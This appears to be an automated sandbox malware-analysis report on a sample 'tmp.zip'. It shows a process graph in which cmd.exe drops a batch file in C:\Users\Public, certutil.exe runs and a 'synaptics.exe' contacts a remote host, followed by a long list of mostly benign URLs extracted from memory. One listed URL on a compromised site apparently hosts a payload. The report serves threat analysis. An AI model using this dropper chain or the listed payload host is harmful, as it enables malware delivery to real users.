behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578816 Sample: tmp.zip Startdate: 20/12/2024 Architecture: WINDOWS Score: 48 34 www.aviationchartersolutions.com 2->34 36 cpanel119.turbify.biz 2->36 40 Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder 2->40 42 Sigma detected: Legitimate Application Dropped Script 2->42 7 cmd.exe 4 2->7         started        10 cmd.exe 1 1 2->10         started        12 OpenWith.exe 16 5 2->12         started        14 4 other processes 2->14 signatures3 process4 file5 32 C:\Users\Public\Windows Security, ASCII 7->32 dropped 16 certutil.exe 2 7->16         started        19 synaptics.exe 202 7->19         started        22 conhost.exe 7->22         started        24 conhost.exe 10->24         started        26 notepad.exe 12->26         started        28 conhost.exe 14->28         started        process6 dnsIp7 30 C:\Users\Public\Windows Security.bat, Unicode 16->30 dropped 38 cpanel119.turbify.biz 52.0.145.89, 443, 49703 AMAZON-AESUS United States 19->38 file8

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    cpanel119.turbify.biz
    52.0.145.89
    truefalse
      unknown
      www.aviationchartersolutions.com
      unknown
      unknownfalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://bugs.python.org/issue13585synaptics.exe, 0000000C.00000003.1678595218.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1678119957.00000000021A0000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/tuyen/tuyen_allsynaptics.exe, 0000000C.00000003.1924350622.0000000004DC0000.00000004.00001000.00020000.00000000.sdmpfalse
            unknown
            https://github.com/urllib3/urllib3/issues/2168z(Andreysynaptics.exe, 0000000C.00000003.1640711301.0000000001581000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1638636357.000000000157D000.00000004.00000020.00020000.00000000.sdmp, __init__.cpython-310.pyc.29126072.12.drfalse
              high
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)synaptics.exe, 0000000C.00000003.1736346735.0000000002851000.00000004.00000020.00020000.00000000.sdmp, connectionpool.cpython-310.pyc.45586216.12.drfalse
                unknown
                https://bugs.python.org/issue39682synaptics.exe, 0000000C.00000003.1747587679.0000000001588000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1749727985.0000000002436000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://python.org/dev/peps/pep-0263/synaptics.exe, 0000000C.00000002.1976070678.000000006CC74000.00000002.00000001.01000000.00000005.sdmpfalse
                    high
                    http://www.accv.es/legislacion_c.htmgsynaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://tools.ietf.org/html/rfc2388#section-4.4synaptics.exe, 0000000C.00000003.1903554609.0000000002230000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1739361059.000000000288E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1898262065.000000000220E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802177462.0000000002208000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1913139873.0000000002231000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1851098627.0000000002231000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1739695884.000000000297A000.00000004.00000020.00020000.00000000.sdmp, fields.cpython-310.pyc.71107712.12.drfalse
                        high
                        https://bugs.python.org/issue29255synaptics.exe, 0000000C.00000003.1685796667.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1687227849.000000000282A000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/synaptics.exe, 0000000C.00000003.1747587679.0000000001588000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1749727985.0000000002436000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://github.com/python/cpython/issues/113199synaptics.exe, 0000000C.00000003.1740875328.0000000002323000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1743273383.000000000242E000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://bugs.python.org/issue19619synaptics.exe, 0000000C.00000003.1631609273.0000000001511000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://github.com/urllib3/urllib3/pull/2624synaptics.exe, 0000000C.00000003.1743487645.0000000002322000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1743273383.000000000242E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://bugs.python.org/issue5845#msg198636synaptics.exe, 0000000C.00000003.1635087873.0000000002161000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.securetrust.com/SGCA.crllsCsynaptics.exe, 0000000C.00000003.1919136548.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915578455.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926150995.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1900287289.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://bugs.python.org/issue12029synaptics.exe, 0000000C.00000003.1678595218.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1678119957.00000000021A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963synaptics.exe, 0000000C.00000002.1940759462.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, ssl_.cpython-310.pyc.45584776.12.drfalse
                                          high
                                          http://www.cert.fnmt.es/dpcs/tBSsynaptics.exe, 0000000C.00000003.1864400413.0000000002870000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.dhimyotis.com/certignarootca.crlsynaptics.exe, 0000000C.00000003.1900287289.000000000239A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1905319819.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1904325037.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1863564990.000000000239A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://curl.haxx.se/rfc/cookie_spec.htmlsynaptics.exe, 0000000C.00000003.1801944128.0000000002245000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802847834.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1832362104.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1800177746.0000000002322000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1823366760.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1950407050.0000000004430000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802847834.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1793425461.0000000002937000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1801577022.0000000002322000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.accv.essynaptics.exe, 0000000C.00000003.1916003967.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1944341426.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1864400413.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1922407233.0000000002870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://repository.swisssign.com/Usynaptics.exe, 0000000C.00000003.1913624681.0000000002375000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002373000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://bugs.python.org/msg352381synaptics.exe, 0000000C.00000003.1702374680.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1701342726.0000000002742000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/pyca/pyopenssl/pull/933synaptics.exe, 0000000C.00000003.1746467587.0000000002443000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://bugs.python.org/issue20164synaptics.exe, 0000000C.00000003.1850523273.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1847786019.00000000028AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxysynaptics.exe, 0000000C.00000002.1947474885.0000000002B60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://httpbin.org/getsynaptics.exe, 0000000C.00000003.1916003967.0000000002859000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1933003469.0000000001597000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1906713042.0000000001597000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1898262065.000000000223D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000217F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1857691039.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1859878626.00000000023C8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926402201.00000000023C8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1863564990.00000000023C6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1899697342.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1856661526.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909607190.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1928633313.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1918424287.00000000023C2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1917550687.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1912360304.0000000001599000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1861801468.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1930132122.0000000001597000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1861640846.00000000015AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxypsynaptics.exe, 0000000C.00000002.1947474885.0000000002B60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://foo.com/synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://wwww.certigna.fr/autorites/0msynaptics.exe, 0000000C.00000003.1900287289.000000000239A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1905319819.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1904325037.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1863564990.000000000239A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.quovadisglobal.com/cps6tsynaptics.exe, 0000000C.00000003.1910070573.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/psf/requests/issues/3772synaptics.exe, 0000000C.00000003.1857691039.0000000002184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://httpbin.org/poolmanager.cpython-310.pyc.45585856.12.drfalse
                                                                          high
                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyzsynaptics.exe, 0000000C.00000003.1746467587.0000000002443000.00000004.00000020.00020000.00000000.sdmp, connection.cpython-310.pyc.71163936.12.drfalse
                                                                            unknown
                                                                            https://wwww.certigna.fr/autorites/synaptics.exe, synaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1937468381.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1927408676.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlsynaptics.exe, 0000000C.00000003.1710559347.000000000222E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1710384662.0000000002245000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1702374680.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1701342726.0000000002742000.00000004.00000020.00020000.00000000.sdmp, datetime.cpython-310.pyc.40578368.12.drfalse
                                                                                high
                                                                                https://github.com/urllib3/urllib3/issues/3267.synaptics.exe, 0000000C.00000003.1746467587.0000000002443000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.htmlsynaptics.exe, 0000000C.00000003.1668650912.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1666349053.0000000002323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/python/cpython/pull/7160#discussion_r195405230synaptics.exe, 0000000C.00000003.1765715869.0000000001588000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1768415687.0000000002438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://gist.github.com/4325783synaptics.exe, 0000000C.00000003.1680774295.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1681487449.0000000001577000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535synaptics.exe, synaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1857691039.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1832362104.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1742112244.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1910070573.0000000001546000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1775047243.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1790661140.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1762745178.000000000154D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1932651699.0000000001549000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1736857629.000000000219F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1745673292.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, timeout.cpython-310.pyc.45584536.12.drfalse
                                                                                          high
                                                                                          https://bugs.python.org/issue29302synaptics.exe, 0000000C.00000003.1678595218.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1678119957.00000000021A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://tools.ietf.org/html/rfc3986#appendix-Asynaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.python.org/psf/license/synaptics.exe, 0000000C.00000002.1936220605.0000000002120000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1635087873.0000000002161000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.quovadisglobal.com/cps61BSsynaptics.exe, 0000000C.00000003.1871414464.0000000001545000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://github.com/pypa/setuptools/issues/417#issuecomment-392298401synaptics.exe, 0000000C.00000002.1934677086.0000000001F60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/psf/requests/issues/3578.synaptics.exe, 0000000C.00000003.1916003967.0000000002860000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1866799112.0000000002860000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1856027303.0000000002872000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1864400413.0000000002860000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://docs.python.org/3.3/howto/logging.html#configuring-logging-for-a-librarysynaptics.exe, 0000000C.00000003.1779276743.000000000243A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.securetrust.com/STCA.crlsynaptics.exe, 0000000C.00000003.1919136548.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915578455.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926150995.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1900287289.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://foo.com:/synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crl.securetrust.com/STCA.crlinsynaptics.exe, 0000000C.00000003.1919136548.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915578455.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926150995.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1900287289.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://wwwsearch.sf.net/):synaptics.exe, 0000000C.00000003.1801944128.0000000002245000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1794795951.000000000243A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802847834.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1902234640.0000000002448000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1921773262.000000000244C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1800177746.0000000002322000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1823366760.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1829093531.000000000244C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1797512291.0000000002366000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802847834.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1908588153.0000000002449000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1793425461.0000000002937000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1809065471.000000000243A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1801577022.0000000002322000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0synaptics.exe, 0000000C.00000003.1916003967.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1944341426.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1864400413.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1922407233.0000000002870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.accv.es/legislacion_c.htmsynaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tools.ietf.org/html/rfc6125#section-6.4.3synaptics.exe, 0000000C.00000003.1803801964.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1774464529.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1949670173.00000000043F0000.00000004.00001000.00020000.00000000.sdmp, ssl_match_hostname.cpython-310.pyc.71153696.12.drfalse
                                                                                                                      high
                                                                                                                      http://repository.swisssign.com/oDsynaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1937468381.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1927408676.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://crl.xrampsecurity.com/XGCA.crl0synaptics.exe, 0000000C.00000003.1917439823.000000000223B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1913139873.000000000223B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1911857606.0000000002238000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1898262065.000000000223D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1903554609.000000000223D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1938183809.000000000223D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://tools.ietf.org/html/rfc3986#section-3.3synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tools.ietf.org/html/rfc7230#section-3.2)synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.cert.fnmt.es/dpcs/synaptics.exe, 0000000C.00000002.1944416307.0000000002884000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1905614319.000000000288F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1904378118.0000000002886000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://repository.swisssign.com/xDsynaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1937468381.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1927408676.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://google.com/mailsynaptics.exe, 0000000C.00000003.1919649165.0000000002433000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1914730730.0000000002430000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1860944335.000000000240E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1906041657.0000000002428000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1903142280.000000000241E000.00000004.00000020.00020000.00000000.sdmp, poolmanager.cpython-310.pyc.45585856.12.drfalse
                                                                                                                                    high
                                                                                                                                    https://packaging.python.org/specifications/entry-points/synaptics.exe, 0000000C.00000002.1947474885.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1942147853.0000000002660000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1749284774.0000000002871000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1745673292.0000000002180000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1744500063.0000000002361000.00000004.00000020.00020000.00000000.sdmp, __init__.cpython-310.pyc.71108160.12.drfalse
                                                                                                                                      high
                                                                                                                                      http://www.accv.es00synaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.python.org/psf/license/)synaptics.exe, 0000000C.00000003.1635023937.0000000001515000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1635023937.0000000001529000.00000004.00000020.00020000.00000000.sdmp, site.cpython-310.pyc.34872536.12.drfalse
                                                                                                                                          high
                                                                                                                                          http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmsynaptics.exe, 0000000C.00000003.1710559347.000000000222E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1710384662.0000000002245000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1702374680.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1701342726.0000000002742000.00000004.00000020.00020000.00000000.sdmp, datetime.cpython-310.pyc.40578368.12.drfalse
                                                                                                                                            high
                                                                                                                                            https://foss.heptapod.net/pypy/pypy/-/issues/3539synaptics.exe, 0000000C.00000002.1940759462.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, ssl_.cpython-310.pyc.45584776.12.drfalse
                                                                                                                                              high
